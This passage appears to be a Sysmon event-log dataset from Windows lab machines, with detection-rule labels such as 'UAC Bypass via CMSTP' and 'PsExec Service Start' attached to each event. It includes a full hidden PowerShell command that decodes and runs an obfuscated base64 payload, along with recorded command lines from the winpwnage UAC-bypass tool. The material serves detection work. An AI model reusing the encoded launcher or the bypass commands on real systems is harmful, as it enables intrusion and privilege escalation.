(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution_attributes":{"ProcessID":2728,"ThreadID":3432},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution_attributes":{"ProcessID":2752,"ThreadID":3576},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Renamed Binary"],"event":{"Event":{"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution_attributes":{"ProcessID":2796,"ThreadID":3572},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 